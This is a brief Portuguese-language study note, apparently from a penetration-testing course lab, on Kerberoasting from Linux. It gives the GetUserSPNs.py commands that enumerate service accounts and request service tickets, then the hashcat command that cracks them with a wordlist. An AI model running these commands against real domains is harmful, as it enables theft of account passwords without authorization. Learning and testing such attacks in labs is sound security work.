Kerberoasting from Linux

Enumeração

• Pesquisar contas kerberoastable com a ferramenta GetUserSPNs.py

GetUserSPNs.py inlanefreight.local/pixis

• solicitar um TGS ticketou Service Ticket (ST)para cada uma delas e obter um hash quebrável no formato do hashcat

GetUserSPNs.py inlanefreight.local/pixis -request

Cracking

hashcat -m 13100 hashes.txt rockyou.txt